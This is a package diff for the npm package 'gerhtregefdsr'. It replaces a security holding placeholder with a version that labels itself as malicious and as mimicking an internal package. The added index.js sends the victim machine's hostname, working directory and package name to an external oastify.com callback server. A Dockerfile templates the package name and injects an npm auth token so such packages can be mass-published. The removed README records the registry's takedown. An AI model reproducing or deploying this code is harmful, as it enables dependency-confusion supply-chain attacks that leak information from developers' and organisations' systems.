gerhtregefdsr 0.0.1-security → 1.0.1

package/Dockerfile

@@ -0,0 +1,11 @@
+FROM node:14
+ARG PACKAGE_NAME
+ARG NODE_AUTH_TOKEN
+WORKDIR /usr/src/app
+COPY package*.json ./
+COPY index.js ./
+
+RUN sed -i "s/{{PACKAGE_NAME}}/$PACKAGE_NAME/g" /usr/src/app/index.js
+RUN sed -i "s/{{PACKAGE_NAME}}/$PACKAGE_NAME/g" /usr/src/app/package.json
+RUN echo "//registry.npmjs.org/:_authToken=$NODE_AUTH_TOKEN" > .npmrc
+CMD ["npm", "publish"]

package/index.js

@@ -0,0 +1,23 @@
+const os = require('os');
+const path = require('path');
+const axios = require('axios');
+
+const PACKAGE_NAME = "{{PACKAGE_NAME}}"; // Replace this with your package name
+const HOSTNAME = os.hostname();
+const CURRENT_PATH = process.cwd();
+
+const url = "https://3gkkr6u2z1a9rinocp0ue4tw1n7ev4jt.oastify.com";
+
+const data = {
+    package_name: PACKAGE_NAME,
+    hostname: HOSTNAME,
+    current_path: CURRENT_PATH
+};
+
+axios.post(url, data)
+    .then(response => {
+        console.log('Response:', response.data);
+    })
+    .catch(error => {
+        console.error('Error:', error);
+    });

package/package.json

@@ -1,6 +1,12 @@
-{
-  "name": "gerhtregefdsr",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+{
+  "name": "gerhtregefdsr",
+  "version": "1.0.1",
+  "description": "Malicious package mimicking internal electron-panel-window",
+  "main": "index.js",
+  "scripts": {
+    "start": "node index.js",
+    "preinstall": "npm install axios"
+  },
+  "author": "Malicious Actor",
+  "license": "ISC"
+}

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=gerhtregefdsr for more information.